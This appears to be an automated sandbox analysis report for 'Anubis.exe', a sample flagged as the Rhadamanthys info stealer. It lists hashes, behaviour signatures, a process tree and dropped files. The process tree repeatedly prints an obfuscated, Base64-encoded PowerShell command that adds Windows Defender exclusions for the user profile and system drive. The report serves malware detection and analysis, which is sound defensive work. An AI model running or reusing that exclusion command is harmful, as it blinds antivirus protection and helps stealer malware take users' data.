Resubmissions

08/08/2024, 13:51

240808-q5zresthmr 10

08/08/2024, 13:48

240808-q38ljsxgnc 10

Analysis

  • max time kernel
    93s
  • max time network
    93s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/08/2024, 13:51

General

  • Target

    Anubis.exe

  • Size

    1.2MB

  • MD5

    c2adb7ff42f1c961035f17bad5bee12d

  • SHA1

    e2ae36539f9ff88e8a89d750e99d15ea6e84f0dc

  • SHA256

    4b350ae0b85aa7f7818e37e3f02397cd3667af8d62eb3132fb3297bd96a0abe2

  • SHA512

    16413f90689cfa3fc509637bea54634ead1bba7f89d621bbc8096279f2413cd3477142a63becfa457e5756583c34049699ab1e960d1133dad2f72e3325ecb348

  • SSDEEP

    24576:uDDgbYd14JwD00GR/L4Sgh5ovGpuIGPBgyjhgQJ8L/inWS:gcbILXoO3p9GP6ydk/inWS

Malware Config

Signatures

  • Detect rhadamanthys stealer shellcode 4 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Anubis.exe
    "C:\Users\Admin\AppData\Local\Temp\Anubis.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c pause
        3⤵
          PID:1880
      • C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
        "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4408
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Drops file in Windows directory
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa4622cc40,0x7ffa4622cc4c,0x7ffa4622cc58
        2⤵
          PID:3460
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1948 /prefetch:2
          2⤵
            PID:4912
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1692,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2080 /prefetch:3
            2⤵
              PID:2856
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2216 /prefetch:8
              2⤵
                PID:4896
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3256 /prefetch:1
                2⤵
                  PID:2756
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3096,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3300 /prefetch:1
                  2⤵
                    PID:2640
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4424 /prefetch:1
                    2⤵
                      PID:3172
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3528,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4788 /prefetch:8
                      2⤵
                        PID:1992
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4896 /prefetch:8
                        2⤵
                          PID:1712
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4272,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4780 /prefetch:1
                          2⤵
                            PID:5040
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3768,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4256 /prefetch:8
                            2⤵
                              PID:2624
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3364,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5040 /prefetch:1
                              2⤵
                                PID:4056
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5292,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5332 /prefetch:8
                                2⤵
                                  PID:1608
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5296,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5460 /prefetch:8
                                  2⤵
                                    PID:400
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5304,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5620 /prefetch:8
                                    2⤵
                                      PID:3740
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5312,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5760 /prefetch:8
                                      2⤵
                                        PID:344
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5320,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5908 /prefetch:8
                                        2⤵
                                          PID:560
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5284,i,9449399724419679391,428777810705028910,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5888 /prefetch:8
                                          2⤵
                                          • NTFS ADS
                                          PID:1228
                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                        1⤵
                                          PID:4816
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                          1⤵
                                            PID:2092
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:2984
                                            • C:\Users\Admin\Downloads\Anubis.exe
                                              "C:\Users\Admin\Downloads\Anubis.exe"
                                              1⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4816
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1484
                                              • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5004
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c pause
                                                  3⤵
                                                    PID:2388
                                                • C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3400
                                              • C:\Users\Admin\Downloads\Anubis.exe
                                                "C:\Users\Admin\Downloads\Anubis.exe"
                                                1⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4092
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3104
                                                • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3164
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c pause
                                                    3⤵
                                                      PID:1040
                                                  • C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4568
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k SDRSVC
                                                  1⤵
                                                    PID:3392

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\535f3bba-fa95-40ff-82e2-f67da2360305.tmp

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    bcc4ec00fb6bc3c437ee28c79d3b00cd

                                                    SHA1

                                                    aeb8ae2dacbe286e1a9016d3a77fb686159c9505

                                                    SHA256

                                                    a45f3b31fe1f6a2b2af0fcfe684aa64f417b6146937d1536b5950537d4a10951

                                                    SHA512

                                                    067deafc1cd3f391d2e59eee75a85115a1be6f24c16aaf7c367411210d7c242def4ef483cb98935592069ff5bbf17a40ec28a214da8d765a95addae4bafe3544

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    f9d25577754a2d7cc81a3aea14cea3a1

                                                    SHA1

                                                    d729de9b954ab78890df717dcaa487c6fbc0c365

                                                    SHA256

                                                    6880abc3d67f04f133308ddb7de3f71e5ad10b0dfc2ae5db56d8aa501d7517aa

                                                    SHA512

                                                    b57c7856d1e03862d2af970db15b923cdc79ce8e3104c0c4316f11004e4f84f69fce3758bb4411b56891be322f630d3998396e58d72f00508f7e670d59684031

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    77de01b92b2a00cd413773e676038ba7

                                                    SHA1

                                                    02e42e8dbef69b6e40e39f5cf91d707216958ac7

                                                    SHA256

                                                    f20a408e932b55c76a3837bcb63d5d2365b41b16036cd6419b1d99d87ff3fed6

                                                    SHA512

                                                    7b03b53376bc40cffd9741f172c8c3103610550ea72bf10260e3b71fc198d826f4340c440c67ef7216ff84602a6f14bbbc7c4c850f3bbf5ad345ab5b6c6740eb

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                    Filesize

                                                    2B

                                                    MD5

                                                    d751713988987e9331980363e24189ce

                                                    SHA1

                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                    SHA256

                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                    SHA512

                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    edca1c8202ea9ff7dd81a257be15ad90

                                                    SHA1

                                                    41fefbccba1c5b18f2f890bdc10bb4525d57dda3

                                                    SHA256

                                                    0d3b857f1095e34ad361afad7274ef82e3636cb132be31f97a46b965cdee57ce

                                                    SHA512

                                                    9c3d6c6bfd3c6b62e1c9dbf1db6a4240644a33affeef1dd77cbca82a1fd1b3e236e9ddcc142290be570c26b2cbfe11ce58533291ce8452e7ae6abc1e5e920900

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    35acec21e415df47f6daf212f2d89c22

                                                    SHA1

                                                    f5db9578bd588d5bbe69557d16b869e1e94a8b4d

                                                    SHA256

                                                    136ebee3b197ed7074442f38350886cddcef4e126d55763ae7c65aac4d85bdf3

                                                    SHA512

                                                    5ce58f79374fb097da08f8794b339c9f6c80370d51950404628da3bca63fa6b2b7d5d20c440a38a7a9dbc9dd188bad23e1b71fed34b33d1dc60f8ff771cc4f52

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                    Filesize

                                                    692B

                                                    MD5

                                                    cd15c9e64c202c39bb4808642f160119

                                                    SHA1

                                                    6d52659a012a9dde541c9ba62b3d047eeaa5c94e

                                                    SHA256

                                                    5865937d7dcb6801022d86da5f1f2bb0706e985ccf8ced239d63070d7a997a5f

                                                    SHA512

                                                    8bcf0c9bf1837a024b092bbf9c665902bf7ad0ea16754ae26c44352d030d0364a84cff9aa336341e39dafdaf339cb7e6d738bf67f1b86752c4b9ff6a1361f2e1

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                    Filesize

                                                    9KB

                                                    MD5

                                                    f8cab07c51266c948c8afc33926c5cc3

                                                    SHA1

                                                    91350e99bbd9030c132af2c4e85be3a941ff411b

                                                    SHA256

                                                    1421727dee0ea60b604991cfd0ddc24b3c840c620578e4946950586c6a81c10d

                                                    SHA512

                                                    18fdacf6bc867fd34b10600a63b7060a32d6b4b3578cc34ebf0632a9b5bf27cf6499197e0d68ae34279e6c7eaec05160f19880bef8e175fb7cc80cbf8117779a

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    b664a0927602285ac8a6ff5514430c23

                                                    SHA1

                                                    fb12427431212005f70395cde88847f675f85560

                                                    SHA256

                                                    0ee11a2f7ed0e8bb14952817146184c8ab2dc2c1264901743b988f3b40da26bb

                                                    SHA512

                                                    17f41d5e35a4c3658886b1ce41437fd85a5f6697b5e903520df02f80064aba7090136ec7d0d8608963f88d508b32271fdaf182fdc3719d3a11c148195aee1ab5

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    9b60d0596a94b814ac19e6313d79810c

                                                    SHA1

                                                    455735616faafbf65670998669f3970399e0f00a

                                                    SHA256

                                                    6bec4b8d56f55a544e80cd70486e5c7c9bc12eb5ca0cb82a259a8576c83cbda9

                                                    SHA512

                                                    657d90fde0539df75e2f646ef3a968f8b15ced69032e1e323e377a83483a1045b043fab8d05809978310591d5893ec84a10c811613ec916dfd942f39651ab192

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                    Filesize

                                                    8KB

                                                    MD5

                                                    a3b87568a5388588eaa79bfd46aef4db

                                                    SHA1

                                                    327baa4f3d26c927cf1d87ee3ea39887f7b5eb40

                                                    SHA256

                                                    ea103b34e6ce2a5a2e42b28dcb294f17ac4525f96eee709da319296d40e27775

                                                    SHA512

                                                    738090801bdf08f3d42a6b8d539ebef056282d51ea0ca8d4a3b9d3d85596eff6bc6b164c1ed943af5116e9d3f6f734c03d68974229aad67bbcaa9f1dec189cea

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    161faa15a37b2f85d4164dd6c485e457

                                                    SHA1

                                                    c07e29819589dc536f09887224d6ca0c6fe436ea

                                                    SHA256

                                                    193d87525c866f955c5404413a8b6ba9610f09a02241dede1807918cb0a37f5d

                                                    SHA512

                                                    54f9693241a4f9d28cb67b3612dfd38ac811f1e40af70fece823a209eb66b87e767e17c41f1469dc9cc1103076bc125666fc581521540676b706ab3b09d4613f

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                    Filesize

                                                    15KB

                                                    MD5

                                                    b5c24946f45ddbebba95b10bd236201b

                                                    SHA1

                                                    154ced7460b446898f2b07304158854d3e98c918

                                                    SHA256

                                                    e63b19dd36683a8c305db38fb8da0eb50776bafc8f6bde04444c864fdadcd7aa

                                                    SHA512

                                                    7cff51e8be0f44587eea2b891e732976a19a5c0a6996f3e6dff0e9845b20b1db5837888e5c791ce4a45940207d36628ccf53acb7c6fa3704a851ea41d6716b6f

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                    Filesize

                                                    193KB

                                                    MD5

                                                    ce2499b462d469a8f5bae07fcf4c196b

                                                    SHA1

                                                    d14217efb78df5bba532f68a0e9dde1b4095489f

                                                    SHA256

                                                    39a843e3e09c6282841e0019d093d8582df287022d38946acdd2eee563b5b0f3

                                                    SHA512

                                                    b9bbfe968decf4399d0331ba6977dccb9e24ee8fd6959fc31845d70ea445f7b17f2f5f661d7d3196861e9b6eb9a2596551b166088c43587b707bfa2f33f2ad26

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                    Filesize

                                                    194KB

                                                    MD5

                                                    9f94198a13a23016fa3a3de630f65b75

                                                    SHA1

                                                    0f4167128772344306637775f87282f96715908a

                                                    SHA256

                                                    d96823cc1faf458321bb1ec9501baa687be2e773803cb8307da32ce82e258082

                                                    SHA512

                                                    51014ff6a2db471b77250839302c9598a8a3cd9d5be6b9f4e445e9eba08ecf142a5081440b77f244b1099e846c252d159bc6c3f879a494e6763344797b1448f5

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    d0c46cad6c0778401e21910bd6b56b70

                                                    SHA1

                                                    7be418951ea96326aca445b8dfe449b2bfa0dca6

                                                    SHA256

                                                    9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

                                                    SHA512

                                                    057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    829761f260043c769a39f643fabdc946

                                                    SHA1

                                                    275422fb77b6ceeaaf72528fb882313468ccb66d

                                                    SHA256

                                                    7c2d42bf46cdaf87b3bfe5f8602de6e9b66ab85277749cc4d0ae39dfed970f08

                                                    SHA512

                                                    9a05513c6bd16bdc8aa166e13844441905d11084ec644ca2e295307bb137241c33db9d2e32ac3e556e41be3f78f7b506f9512b206afc22db64c3bcd0d721680b

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    18KB

                                                    MD5

                                                    c5098cd64da05901c98d7c69ef0a5493

                                                    SHA1

                                                    bee5b7607b9b1efe0624e19e6eab744cca9f0b46

                                                    SHA256

                                                    31cb3c1b382fb883352dc4a480c20346f37462ce01ee5ee9cde4c68805e77caa

                                                    SHA512

                                                    3d936b271c317dc027ba52ae6cda3756aadd7592848a9e86d3f9f62170809fd8cc364f2bdaa68fa06ed8039cc32a031875504ce3fcb1f5c75c312b168bb49aa8

                                                  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe

                                                    Filesize

                                                    748KB

                                                    MD5

                                                    a8db312e9364d1d82600bf5a398212fe

                                                    SHA1

                                                    3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb

                                                    SHA256

                                                    84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb

                                                    SHA512

                                                    a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782

                                                  • C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

                                                    Filesize

                                                    456KB

                                                    MD5

                                                    515a0c8be21a5ba836e5687fc2d73333

                                                    SHA1

                                                    c52be9d0d37ac1b8d6bc09860e68e9e0615255ab

                                                    SHA256

                                                    9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae

                                                    SHA512

                                                    4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_if5cw140.pvm.ps1

                                                    Filesize

                                                    60B

                                                    MD5

                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                    SHA1

                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                    SHA256

                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                    SHA512

                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

                                                    Filesize

                                                    2B

                                                    MD5

                                                    f3b25701fe362ec84616a93a45ce9998

                                                    SHA1

                                                    d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                    SHA256

                                                    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                    SHA512

                                                    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

